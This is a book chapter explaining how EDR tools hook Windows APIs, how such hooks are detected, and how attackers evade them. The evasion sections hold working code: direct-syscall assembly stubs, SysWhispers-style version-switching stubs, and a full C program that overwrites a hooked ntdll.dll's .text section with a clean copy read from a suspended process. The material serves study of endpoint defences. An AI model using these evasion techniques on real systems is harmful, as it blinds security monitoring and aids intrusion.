Function-Hooking DLLs

Chapter 2

The majority of malicious actions that interact with the Windows ecosystem are carried out through Windows APIs. These APIs are essentially functions that perform some unit of work inside the Windows operating system.
Thus, to detect and monitor what these APIs are doing, EDRs use function-hooking DLLs to "hook" these APIs and intercept the data passing through them.
The same approach applies on other operating systems, such as Linux and macOS. In this chapter, however, we will focus on Windows APIs and their kernel counterparts.

How Function Hooking Works

Code running in user mode typically leverages the Win32 API during execution to perform certain functions on the host, such as requesting a handle to another process.
However, in many cases, the functionality provided via Win32 can’t be completed entirely in user mode. Some actions, such as memory and object management, are the responsibility of the kernel.
To transfer execution to the kernel, x64 systems use a syscall instruction. But rather than implementing syscall instructions in every function that needs to interact with the kernel, Windows provides them via functions in "ntdll.dll". A function simply needs to pass the required parameters to this exported function; the function will, in turn, pass control into the kernel and then return the results of the operation. To detect malicious activity, EDRs "hook" these APIs.

In earlier versions of Windows, vendors (and malware authors) often placed their hooks on the System Service Dispatch Table (SSDT), a table in the kernel that holds the pointers to the kernel functions used upon invocation of a syscall. Security products would overwrite these function pointers with pointers to functions in their own kernel module used to log information about the function call and then execute the target function. They would then pass the return values back to the source application.
But in 2005, with the x64 editions of Windows XP and Windows Server 2003, Microsoft introduced Kernel Patch Protection (KPP), also known as PatchGuard, which prevents the patching of the SSDT. As a result, EDRs started hooking user-mode Windows APIs to intercept data.
Because the functions performing the syscalls in ntdll.dll are the last possible place to observe API calls in user mode, EDRs will often hook these functions in order to inspect their invocation and execution.

By intercepting calls to these APIs, an EDR can observe the parameters passed to the original function, as well as the value returned to the code that called the API. Agents can then examine this data to determine whether the activity was malicious.
For example, to detect remote process injection, an agent could monitor whether the region of memory was allocated with read-write-execute permissions, whether data was written to the new allocation, and whether a thread was created using a pointer to the written data.
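The correlation described above can be sketched as a small state machine in portable C. This is only an illustration: the event structure, its field names, and the observe() function are hypothetical stand-ins for whatever an agent's hooks would actually report, and the sketch tracks a single region. The value 0x40 matches the Windows PAGE_EXECUTE_READWRITE constant.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical event kinds that an agent's hooks might report. */
typedef enum { EV_ALLOC, EV_WRITE, EV_CREATE_THREAD } event_kind;

typedef struct {
    event_kind kind;
    uint32_t   target_pid; /* process being acted on */
    uint64_t   address;    /* allocation base, write destination, or thread start */
    uint64_t   size;       /* allocation or write size (unused for threads) */
    uint32_t   protect;    /* page protection (allocations only) */
} hook_event;

#define PROT_RWX 0x40u /* value of PAGE_EXECUTE_READWRITE on Windows */

/* Tracks one suspicious region in one remote process. */
typedef struct {
    bool     have_rwx;
    bool     written;
    uint32_t pid;
    uint64_t base;
    uint64_t size;
} injection_tracker;

static bool in_region(const injection_tracker *t, uint32_t pid, uint64_t addr)
{
    return t->have_rwx && pid == t->pid &&
           addr >= t->base && addr - t->base < t->size;
}

/* Feeds one event to the tracker. Returns true once the full sequence
 * allocate(RWX) -> write -> create thread has been observed. */
bool observe(injection_tracker *t, const hook_event *ev)
{
    switch (ev->kind) {
    case EV_ALLOC:
        if (ev->protect == PROT_RWX) {
            t->have_rwx = true;
            t->written  = false;
            t->pid      = ev->target_pid;
            t->base     = ev->address;
            t->size     = ev->size;
        }
        return false;
    case EV_WRITE:
        if (in_region(t, ev->target_pid, ev->address))
            t->written = true;
        return false;
    case EV_CREATE_THREAD:
        return t->written && in_region(t, ev->target_pid, ev->address);
    }
    return false;
}
```

A zero-initialized injection_tracker is fed events in the order the hooks observe them; a thread creation with no preceding RWX allocation and write into the same region does not trigger it.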

Microsoft Detours

While a large number of libraries make it easy to implement function hooks, most leverage the same technique under the hood. This is because, at its core, all function hooking involves patching unconditional jump (JMP) instructions to redirect the flow of execution from the function being hooked into the function specified by the developer of the EDR.
Microsoft Detours is one of the most commonly used libraries for implementing function hooks. Behind the scenes, Detours replaces the first few instructions in the function to be hooked with an unconditional JMP instruction that will redirect execution to a developer-defined function, also referred to as a detour.
This detour function performs actions specified by the developer, such as logging the parameters passed to the target function. Then it passes execution to another function, often called a trampoline, which executes the target function and contains the instructions that were originally overwritten. When the target function completes its execution, control is returned to the detour. The detour may perform additional processing, such as logging the return value or output of the original function, before returning control to the original process.
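The flow of control between caller, detour, trampoline, and target can be modeled in portable C. This is a simplified sketch, not how Detours is implemented: it swaps a function pointer instead of patching a JMP into the target's code, and every name in it (real_sleep, sleep_entry, detour_sleep, install_hook, call_sleep) is made up for illustration.

```c
#include <stdio.h>

typedef unsigned (*sleep_fn)(unsigned);

/* Stand-in for the hooked API; it simply returns the value it was given. */
static unsigned real_sleep(unsigned ms) { return ms; }

/* What callers invoke. A real hook patches a JMP into the function body;
 * this model redirects a pointer instead. */
static sleep_fn sleep_entry = real_sleep;

/* Plays the role of the trampoline: a way to reach the original code. */
static sleep_fn trampoline;

static unsigned calls_logged; /* number of calls the detour has seen */

static unsigned detour_sleep(unsigned ms)
{
    printf("[detour] Sleep(%u) called\n", ms);      /* inspect the parameters */
    unsigned result = trampoline(ms);               /* run the original code  */
    printf("[detour] Sleep returned %u\n", result); /* inspect the result     */
    calls_logged++;
    return result;                                  /* back to the caller     */
}

void install_hook(void)
{
    if (sleep_entry == detour_sleep)
        return;                  /* already hooked */
    trampoline  = sleep_entry;   /* remember the original entry point */
    sleep_entry = detour_sleep;  /* redirect callers to the detour    */
}

unsigned call_sleep(unsigned ms) { return sleep_entry(ms); }
```

Before install_hook() runs, call_sleep() reaches real_sleep() directly; afterward, every call passes through detour_sleep() first. With the real library, the equivalent step is performed by DetourAttach() inside a DetourTransactionBegin() / DetourTransactionCommit() pair.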

Examining a hooked function in a debugger, such as WinDbg, clearly shows the differences between a function that has been hooked and one that hasn’t. Shown below is the unhooked kernel32!SleepStub() function in WinDbg.

1:004> uf KERNEL32!SleepStub
KERNEL32!SleepStub:
00007ffa`9d6fada0 48ff25695c0600 jmp  qword ptr [KERNEL32!_imp_Sleep (00007ffa`9d760a10)]
KERNEL32!_imp_Sleep:
00007ffa`9d760a10 d08fcc9cfa7f   ror byte ptr [rdi+7FFA9CCCh],1
00007ffa`9d760a16 0000           add byte ptr [rax],al
00007ffa`9d760a18 90             nop
00007ffa`9d760a19 f4             hlt
00007ffa`9d760a1a cf             iretd

This disassembly of the function shows the execution flow that we expect. When the caller invokes kernel32!Sleep(), the jump stub kernel32!SleepStub() is executed, long-jumping (JMP) to kernel32!_imp_Sleep(), which provides the real Sleep() functionality the caller expects.
But if the function is hooked by an EDR, the execution flow is drastically altered, as shown below in the WinDbg output.

1:005> uf KERNEL32!SleepStub
KERNEL32!SleepStub:
00007ffa`9d6fada0 e9d353febf jmp 00007ffa`5d6e0178
00007ffa`9d6fada5 cc         int 3
00007ffa`9d6fada6 cc         int 3
00007ffa`9d6fada7 cc         int 3
00007ffa`9d6fada8 cc         int 3
00007ffa`9d6fada9 cc         int 3
00007ffa`9d6fadaa cc         int 3
00007ffa`9d6fadab cc         int 3

1:005> u 00007ffa`5d6e0178
00007ffa`5d6e0178 ff25f2ffffff jmp qword ptr [00007ffa`5d6e0170]
00007ffa`5d6e017e cc         int 3
00007ffa`5d6e017f cc         int 3
00007ffa`5d6e0180 0000       add byte ptr [rax],al
00007ffa`5d6e0182 0000       add byte ptr [rax],al
00007ffa`5d6e0184 0000       add byte ptr [rax],al
00007ffa`5d6e0186 0000       add byte ptr [rax],al
00007ffa`5d6e0188 0000       add byte ptr [rax],al

Instead of a JMP to kernel32!_imp_Sleep(), the disassembly contains a series of JMP instructions, the second of which lands execution in trampoline64!TimedSleep(). Its disassembly is shown below:

0:005> uf poi(00007ffa`5d6e0170)
trampoline64!TimedSleep
 10 00007ffa`82881010 48895c2408     mov qword ptr [rsp+8],rbx
 10 00007ffa`82881015 57             push rdi
 10 00007ffa`82881016 4883ec20       sub rsp,20h
 10 00007ffa`8288101a 8bf9           mov edi,ecx
 10 00007ffa`8288101c 4c8d05b5840000 lea r8,[trampoline64!'string' (00007ffa`828894d8)]
 10 00007ffa`82881023 33c9           xor ecx,ecx
 10 00007ffa`82881025 488d15bc840000 lea rdx,[trampoline64!'string' (00007ffa`828894e8)]
 10 00007ffa`8288102c 41b930000000   mov r9d,30h
 10 00007ffa`82881032 ff15f8800000   call qword ptr [trampoline64!_imp_MessageBoxW]
 10 00007ffa`82881038 ff15ca7f0000   call qword ptr [trampoline64!_imp_GetTickCount]
 10 00007ffa`8288103e 8bcf           mov ecx,edi
 10 00007ffa`82881040 8bd8           mov ebx,eax
 10 00007ffa`82881042 ff15f0a60000   call qword ptr [trampoline64!TrueSleep]
 10 00007ffa`82881048 ff15ba7f0000   call qword ptr [trampoline64!_imp_GetTickCount]
 10 00007ffa`8288104e 2bc3           sub eax,ebx
 10 00007ffa`82881050 f00fc105e8a60000 lock xadd dword ptr [trampoline64!dwSlept],eax
 10 00007ffa`82881058 488b5c2430     mov rbx,qword ptr [rsp+30h]
 10 00007ffa`8288105d 4883c420       add rsp,20h
 10 00007ffa`82881061 5f             pop rdi
 10 00007ffa`82881062 c3             ret

To collect metrics about the hooked function’s execution, this detour function displays a pop-up message and then measures how long the call sleeps. It does so by calling GetTickCount() before and after invoking the legitimate kernel32!Sleep() function through its internal trampoline64!TrueSleep pointer, then adding the elapsed time, in milliseconds, to the trampoline64!dwSlept counter.
While this is a simple example, it shows the gist of how function hooking works. In a real EDR, functions important to adversary behavior, such as ntdll!NtWriteVirtualMemory() for copying code into a remote process, would be proxied in the same way, but the hooking might pay more attention to the parameters being passed and the values returned.
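The five-byte patch at the start of the hooked kernel32!SleepStub() listing above (e9 d3 53 fe bf) can be reproduced by hand. The sketch below, in portable C, encodes a near JMP (opcode E9 followed by a 32-bit little-endian displacement measured from the end of the instruction). The function name encode_jmp_rel32() is made up for this example and is not part of any hooking library.

```c
#include <stdbool.h>
#include <stdint.h>

/* Writes a 5-byte "JMP rel32" (opcode E9) that jumps from `from` to `to`.
 * Returns false if the target is outside the +/-2 GB range rel32 can reach. */
bool encode_jmp_rel32(uint64_t from, uint64_t to, uint8_t out[5])
{
    /* The displacement is relative to the address of the next instruction,
     * which is 5 bytes past the start of the JMP. */
    int64_t disp = (int64_t)(to - (from + 5));
    if (disp < INT32_MIN || disp > INT32_MAX)
        return false;

    uint32_t d = (uint32_t)(int32_t)disp;
    out[0] = 0xE9;
    out[1] = (uint8_t)(d);        /* displacement, least significant byte first */
    out[2] = (uint8_t)(d >> 8);
    out[3] = (uint8_t)(d >> 16);
    out[4] = (uint8_t)(d >> 24);
    return true;
}
```

Calling it with from = 0x00007ffa9d6fada0 and to = 0x00007ffa5d6e0178, the two addresses in the listing, yields the same five bytes that WinDbg shows at the entry point of the hooked function.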

Injecting the DLL

Until Windows 8, many vendors opted to use the AppInit_DLLs infrastructure to load their DLLs into every interactive process (those that import user32.dll). Unfortunately, malware authors routinely abused this technique for persistence and information collection, and it was notorious for causing system performance issues. Microsoft no longer recommends this method for DLL injection and, starting in Windows 8, prevents it entirely on systems with Secure Boot enabled.
The most commonly used technique for injecting a function-hooking DLL into processes is to leverage a driver, which can use a kernel-level feature called kernel asynchronous procedure call (KAPC) injection to insert the DLL into the process.
When the driver is notified of the creation of a new process, it will allocate some of the process’s memory for an APC routine and the name of the DLL to inject. It will then initialize a new APC object, which is responsible for loading the DLL into the process, and copy it into the process’s address space.
Finally, it will change a flag in the thread’s APC state to force execution of the APC. When the process resumes its execution, the APC routine will run, loading the DLL.

Detecting Function Hooks

Detecting hooked native API functions, especially those in ntdll.dll, is straightforward. Each syscall function exported by ntdll.dll consists of a syscall stub. The instructions that make up this stub are:

mov r10, rcx
mov eax, <syscall_number>
syscall
retn

This stub can also be seen in WinDbg's disassembler:

0:013> u ntdll!NtAllocateVirtualMemory
ntdll!NtAllocateVirtualMemory
00007fff`fe90c0b0 4c8bd1           mov r10,rcx
00007fff`fe90c0b3 b818000000       mov eax,18h
00007fff`fe90c0b8 f694259893fe7f01 test byte ptr [SharedUserData+0x308],1
00007fff`fe90c0c0 7503             jne ntdll!NtAllocateVirtualMemory+0x15
00007fff`fe90c0c2 0f05             syscall
00007fff`fe90c0c4 c3               ret
00007fff`fe90c0c5 cd2e             int 2Eh
00007fff`fe90c0c7 c3               ret

In the disassembly of ntdll!NtAllocateVirtualMemory(), we see the basic building blocks of the syscall stub. The stub preserves the volatile RCX register in the R10 register and then moves the syscall number that correlates to NtAllocateVirtualMemory(), or 0x18 in this version of Windows, into EAX.
Next, the TEST and conditional jump (JNE) instructions following MOV are a check found in all syscall stubs. Restricted User Mode uses it when Hypervisor Code Integrity is enabled for kernel-mode code but not user-mode code. You can safely ignore it in this context.
Finally, the syscall instruction is executed, transitioning control to the kernel to handle the memory allocation. When the function completes and control is given back to ntdll!NtAllocateVirtualMemory(), it simply returns.
Because the syscall stub is the same for all native APIs, any modification of it indicates the presence of a function hook. For example, see the below tampered syscall stub:

0:013> u ntdll!NtAllocateVirtualMemory
ntdll!NtAllocateVirtualMemory
00007fff`fe90c0b0 e95340baff       jmp 00007fff`fe4b0108
00007fff`fe90c0b5 90               nop
00007fff`fe90c0b6 90               nop
00007fff`fe90c0b7 90               nop
00007fff`fe90c0b8 f694259893fe7f01 test byte ptr [SharedUserData+0x308],1
00007fff`fe90c0c0 7503             jne ntdll!NtAllocateVirtualMemory+0x15
00007fff`fe90c0c2 0f05             syscall
00007fff`fe90c0c4 c3               ret
00007fff`fe90c0c5 cd2e             int 2Eh
00007fff`fe90c0c7 c3               ret

Notice here that, rather than the syscall stub existing at the entry point of ntdll!NtAllocateVirtualMemory(), an unconditional JMP instruction is present. EDRs commonly use this type of modification to redirect execution flow to their hooking DLL.
Thus, to detect hooks placed by an EDR, we can simply examine functions in the copy of ntdll.dll currently loaded into our process, comparing their entry-point instructions with the expected opcodes of an unmodified syscall stub.
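A minimal sketch of that comparison, in portable C, is shown here. It checks only the first eight bytes against the opcodes seen in the listings above (4C 8B D1 for mov r10, rcx, then B8 followed by a 32-bit syscall number). The function name is_clean_syscall_stub() is hypothetical, and a hook placed deeper in the function would not be caught by this check.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Returns true if the bytes at `code` begin like an unmodified x64 syscall stub:
 *   4C 8B D1        mov r10, rcx
 *   B8 imm32        mov eax, <syscall_number>
 * On success, the syscall number is stored in *number (if non-NULL). */
bool is_clean_syscall_stub(const uint8_t *code, size_t len, uint32_t *number)
{
    if (len < 8)
        return false;
    if (code[0] != 0x4C || code[1] != 0x8B || code[2] != 0xD1)
        return false;
    if (code[3] != 0xB8)
        return false;

    if (number) {
        /* imm32 is stored little-endian */
        *number = (uint32_t)code[4]
                | (uint32_t)code[5] << 8
                | (uint32_t)code[6] << 16
                | (uint32_t)code[7] << 24;
    }
    return true;
}
```

On Windows, the pointer passed in would typically come from GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory"). Fed the first eight bytes of the clean listing, the function reports syscall number 0x18; fed the tampered listing, which starts with E9, it returns false.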

Evading Function Hooks

Attackers can use a myriad of methods to evade function interception, all of which generally boil down to one of the following techniques:
- Making direct syscalls to execute the instructions of an unmodified syscall stub
- Remapping ntdll.dll to get unhooked function pointers or overwriting the hooked ntdll.dll currently mapped in the process
- Blocking non-Microsoft DLLs from loading in the process to prevent the EDR’s function-hooking DLL from placing its detours.
This is by no means an exhaustive list.

Direct Syscalls

By far, the most commonly abused technique for evading hooks placed on ntdll.dll functions is making direct syscalls. If we execute the instructions of a syscall stub ourselves, we can mimic an unmodified function.
To do so, our code must include the desired function’s signature, a stub containing the correct syscall number, and an invocation of the target function. This invocation uses the signature and stub to pass in the required parameters and execute the target function in a way that the function hooks won’t detect.
Below is the first file needed to execute direct syscalls.

; Assembly instructions for NtAllocateVirtualMemory()

NtAllocateVirtualMemory PROC
        mov r10, rcx
        mov eax, 0018h
        syscall
        ret
NtAllocateVirtualMemory ENDP

The first file in our project contains what amounts to a reimplementation of ntdll!NtAllocateVirtualMemory(). The instructions contained inside the sole function will fill the EAX register with the syscall number. Then, a syscall instruction is executed. This assembly code would reside in its own .asm file, and Visual Studio can be configured to compile it using the Microsoft Macro Assembler (MASM), with the rest of the project.
Even though we have our syscall stub built out, we still need a way to call it.

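// To be included in the project header file
#include <windows.h>
#include <winternl.h> // defines NTSTATUS

EXTERN_C NTSTATUS NtAllocateVirtualMemory(
    HANDLE ProcessHandle,
    PVOID *BaseAddress,   // in/out: pointer to the requested base address
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,   // in/out: pointer to the requested size in bytes
    ULONG AllocationType,
    ULONG Protect);

This function definition should live in our header file, syscall.h, and will be included in our C source file.

#include "syscall.h"

int wmain(void)
{
    LPVOID lpAllocationStart = NULL;
    SIZE_T regionSize = 0x1000;

    // BaseAddress and RegionSize are in/out parameters, so we pass pointers.
    NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(),
        &lpAllocationStart,
        0,
        &regionSize,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE);

    return status >= 0 ? 0 : 1; // non-negative NTSTATUS values indicate success
}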

The wmain() function in this file calls NtAllocateVirtualMemory() to allocate a 0x1000-byte buffer in the current process with read-write permissions. This function is not defined in the header files that Microsoft makes available to developers, so we have to define it in our own header file.
When this function is invoked, rather than calling into ntdll.dll, the assembly code we included in the project will be called, effectively simulating the behavior of an unhooked ntdll!NtAllocateVirtualMemory() without running the risk of hitting an EDR’s hook.
One of the primary challenges of this technique is that Microsoft frequently changes syscall numbers, so any tooling that hardcodes these numbers may only work on specific Windows builds. To help address this limitation, many developers rely on external sources to track these changes. For example, Mateusz Jurczyk of Google’s Project Zero maintains a list of functions and their associated syscall numbers for each release of Windows.
In December 2019, Jackson Thuraisamy published the tool SysWhispers, which gave attackers the ability to dynamically generate the function signatures and assembly code for the syscalls in their offensive tooling.
Shown below is the assembly code generated by SysWhispers when targeting the ntdll!NtCreateThreadEx() function on builds 1903 through 20H2 of Windows 10.

NtCreateThreadEx PROC
        mov rax, gs:[60h]                    ; Load PEB into RAX.
NtCreateThreadEx_Check_X_X_XXXX:             ; Check major version.
        cmp dword ptr [rax+118h], 10
        je  NtCreateThreadEx_Check_10_0_XXXX
        jmp NtCreateThreadEx_SystemCall_Unknown
NtCreateThreadEx_Check_10_0_XXXX:            ; Check build number.
        cmp word ptr [rax+120h], 18362
        je  NtCreateThreadEx_SystemCall_10_0_18362
        cmp word ptr [rax+120h], 18363
        je  NtCreateThreadEx_SystemCall_10_0_18363
        cmp word ptr [rax+120h], 19041
        je  NtCreateThreadEx_SystemCall_10_0_19041
        cmp word ptr [rax+120h], 19042
        je  NtCreateThreadEx_SystemCall_10_0_19042
        jmp NtCreateThreadEx_SystemCall_Unknown
NtCreateThreadEx_SystemCall_10_0_18362:      ; Windows 10.0.18362 (1903)
        mov eax, 00bdh
        jmp NtCreateThreadEx_Epilogue
NtCreateThreadEx_SystemCall_10_0_18363:      ; Windows 10.0.18363 (1909)
        mov eax, 00bdh
        jmp NtCreateThreadEx_Epilogue
NtCreateThreadEx_SystemCall_10_0_19041:      ; Windows 10.0.19041 (2004)
        mov eax, 00c1h
        jmp NtCreateThreadEx_Epilogue
NtCreateThreadEx_SystemCall_10_0_19042:      ; Windows 10.0.19042 (20H2)
        mov eax, 00c1h
        jmp NtCreateThreadEx_Epilogue
NtCreateThreadEx_SystemCall_Unknown:         ; Unknown/unsupported version.
        ret
NtCreateThreadEx_Epilogue:
        mov r10, rcx
        syscall
        ret
NtCreateThreadEx ENDP
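The version checks in the listing above amount to a lookup table keyed on the OS build number, which the stub reads from the PEB. A rough C rendering of the same logic follows. The table values are copied from the listing; the type and function names are made up for this sketch, and it takes the version numbers as parameters rather than reading the PEB.

```c
#include <stddef.h>
#include <stdint.h>

typedef struct {
    uint16_t build;  /* OS build number */
    uint32_t number; /* syscall number on that build */
} build_syscall;

/* Values copied from the NtCreateThreadEx listing above. */
static const build_syscall nt_create_thread_ex[] = {
    { 18362, 0x00BD }, /* Windows 10 1903 */
    { 18363, 0x00BD }, /* Windows 10 1909 */
    { 19041, 0x00C1 }, /* Windows 10 2004 */
    { 19042, 0x00C1 }, /* Windows 10 20H2 */
};

/* Returns the NtCreateThreadEx syscall number for the given OS version,
 * or -1 when the version is not in the table. */
int32_t lookup_nt_create_thread_ex(uint32_t major, uint16_t build)
{
    if (major != 10)
        return -1;

    size_t n = sizeof nt_create_thread_ex / sizeof nt_create_thread_ex[0];
    for (size_t i = 0; i < n; i++) {
        if (nt_create_thread_ex[i].build == build)
            return (int32_t)nt_create_thread_ex[i].number;
    }
    return -1;
}
```

Any build missing from the table falls through to -1, mirroring the Unknown label in the assembly, where the stub returns without issuing a syscall.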

But this still doesn't resolve the issue, as red teamers would need to regenerate these stubs for each new version of Windows and replace them whenever necessary. This process is tedious and hard to sustain in large commercial environments. This brings us to dynamically resolving syscall numbers.

Dynamically Resolving Syscall Numbers

In December 2020, a researcher known as modexpblog suggested another function-hook evasion technique: dynamically resolving syscall numbers at runtime, which kept attackers from having to hardcode the values for each Windows build.
This technique uses the following workflow to create a dictionary of function names and syscall numbers:
1. Get a handle to the current process’s mapped ntdll.dll.
2. Enumerate all exported functions that begin with Zw to identify system calls. Note that functions prefixed with Nt (which are more commonly seen) work identically when called from user mode. The decision to use the Zw versions appears to be arbitrary in this case.
3. Store the exported function names and their associated relative virtual addresses.
4. Sort the dictionary by relative virtual addresses.
5. Define the syscall number of the function as its index in the dictionary after sorting.
This technique allows us to collect syscall numbers at runtime, insert them into the stub at the appropriate location, and then call the target functions as we otherwise would in the statically coded method.
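Steps 4 and 5 of the workflow above can be sketched in portable C. Collecting the names and addresses (steps 1 through 3) requires walking the export directory of ntdll.dll and is left out here; the zw_export structure and both function names are hypothetical, chosen only for this illustration.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

typedef struct {
    const char *name; /* exported name, for example "ZwClose" */
    uint32_t    rva;  /* relative virtual address of the export */
} zw_export;

static int by_rva(const void *a, const void *b)
{
    uint32_t x = ((const zw_export *)a)->rva;
    uint32_t y = ((const zw_export *)b)->rva;
    return (x > y) - (x < y);
}

/* Step 4: sort the collected Zw* exports by RVA, in place. */
void sort_zw_exports(zw_export *exports, size_t count)
{
    qsort(exports, count, sizeof *exports, by_rva);
}

/* Step 5: the position of `name` in the sorted array is treated as its
 * syscall number. Returns -1 if the name is not present. */
int syscall_number(const zw_export *sorted, size_t count, const char *name)
{
    for (size_t i = 0; i < count; i++) {
        if (strcmp(sorted[i].name, name) == 0)
            return (int)i;
    }
    return -1;
}
```

The array passed in must contain every Zw-prefixed export, since a missing entry would shift the index of every function that follows it. Because the ordering depends only on where the stubs sit in the image, it is unaffected by an EDR overwriting the stub bytes themselves.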

Remapping ntdll.dll

Another common technique used to evade user-mode function hooks is to load a new copy of ntdll.dll into the process, overwrite the existing hooked version with the contents of the newly loaded file, and then call the desired functions.
This strategy works because the newly loaded ntdll.dll does not contain the hooks implemented in the copy loaded earlier, so when it overwrites the tainted version, it effectively cleans out all the hooks placed by the EDR.
The clean ntdll.dll can either be provided manually or extracted from a suspended process. Providing it manually is risky because processes don't normally read ntdll.dll from disk themselves.
An alternative way to unhook ntdll.dll is to read it from a suspended process. This works because EDRs require a running process to install their hooks, so a process created in a suspended state will contain a clean ntdll.dll image. The .text section of the current process's copy can then be replaced with that of the suspended one.
Below is example code that does exactly that:

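#include <windows.h>
#include <psapi.h>   // GetModuleInformation (link with psapi.lib)
#include <string.h>

// Overwrites the .text section of the module at hookedBase with the same
// section from the clean copy at freshBase. Returns true on success.
static bool RestoreTextSection(LPVOID hookedBase, LPVOID freshBase) {
    PIMAGE_DOS_HEADER hooked_dos = (PIMAGE_DOS_HEADER)hookedBase;
    PIMAGE_NT_HEADERS hooked_nt =
        (PIMAGE_NT_HEADERS)((ULONG_PTR)hookedBase + hooked_dos->e_lfanew);

    // Sanity-check the copy that was read from the suspended process.
    PIMAGE_DOS_HEADER fresh_dos = (PIMAGE_DOS_HEADER)freshBase;
    if (fresh_dos->e_magic != IMAGE_DOS_SIGNATURE)
        return false;
    PIMAGE_NT_HEADERS fresh_nt =
        (PIMAGE_NT_HEADERS)((ULONG_PTR)freshBase + fresh_dos->e_lfanew);
    if (fresh_nt->Signature != IMAGE_NT_SIGNATURE)
        return false;

    PIMAGE_SECTION_HEADER section = IMAGE_FIRST_SECTION(hooked_nt);
    for (WORD i = 0; i < hooked_nt->FileHeader.NumberOfSections; i++, section++) {
        // Section names are 8 bytes long and not always null-terminated.
        if (strncmp((const char *)section->Name, ".text", IMAGE_SIZEOF_SHORT_NAME) != 0)
            continue;

        LPVOID hooked_text = (LPVOID)((ULONG_PTR)hookedBase + section->VirtualAddress);
        LPVOID fresh_text = (LPVOID)((ULONG_PTR)freshBase + section->VirtualAddress);
        SIZE_T size = section->Misc.VirtualSize;
        DWORD oldProtect = 0;

        // Make the hooked code writable, copy in the clean bytes, then
        // restore the original protection.
        if (!VirtualProtect(hooked_text, size, PAGE_EXECUTE_READWRITE, &oldProtect))
            return false;
        RtlCopyMemory(hooked_text, fresh_text, size);
        VirtualProtect(hooked_text, size, oldProtect, &oldProtect);
        return true;
    }
    return false;
}

int wmain() {
    MODULEINFO mi;
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&mi, sizeof(MODULEINFO));
    ZeroMemory(&si, sizeof(STARTUPINFOW));
    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));
    si.cb = sizeof(STARTUPINFOW);

    // Locate the (possibly hooked) ntdll.dll mapped into this process.
    if (!GetModuleInformation(GetCurrentProcess(),
            GetModuleHandleW(L"ntdll.dll"),
            &mi, sizeof(MODULEINFO)))
        return 1;

    // Create a suspended process whose ntdll.dll has not been hooked yet.
    if (!CreateProcessW(L"C:\\Windows\\System32\\notepad.exe",
            NULL, NULL, NULL, TRUE, CREATE_SUSPENDED,
            NULL, NULL, &si, &pi))
        return 1;

    // Copy the child's ntdll.dll image into a local buffer. This assumes the
    // child maps ntdll.dll at the same base address as the current process.
    bool ok = false;
    LPVOID pNtdll = HeapAlloc(GetProcessHeap(), 0, mi.SizeOfImage);
    if (pNtdll && ReadProcessMemory(pi.hProcess, (LPCVOID)mi.lpBaseOfDll,
            pNtdll, mi.SizeOfImage, nullptr))
        ok = RestoreTextSection(mi.lpBaseOfDll, pNtdll);

    if (pNtdll)
        HeapFree(GetProcessHeap(), 0, pNtdll);
    TerminateProcess(pi.hProcess, 0);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);

    return ok ? 0 : 1;
}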

This minimal example first opens a handle to the copy of ntdll.dll currently mapped into our process, gets its base address, and parses its PE headers. Next, it creates a suspended process and parses the PE headers of this process’s copy of ntdll.dll, which hasn’t had the chance to be hooked by the EDR yet.
At this point, we can parse the PE headers of the hooked ntdll.dll, looking for the address of the .text section, which holds the executable code in the image. Once we find it, we change the permissions of that region of memory so that we can write to it, copy in the contents of the .text section from the “clean” DLL, and revert the change to memory protection.
After this sequence of events completes, the hooks originally placed by the EDR should have been removed and the developer can call whichever function from ntdll.dll they need without the fear of execution being redirected to the EDR’s DLL.
As with all things, there is a trade-off here as well, as our new suspended process creates another opportunity for detection, such as by a hooked ntdll!NtCreateProcessEx(), the driver, or the ETW provider. It is also very rare to see a legitimate program create a suspended process.

While function hooking provides very useful information to an EDR, it is very susceptible to bypass due to inherent weaknesses in its common implementations. For that reason, most mature EDRs today consider it an auxiliary telemetry source and instead rely on more resilient sensors.
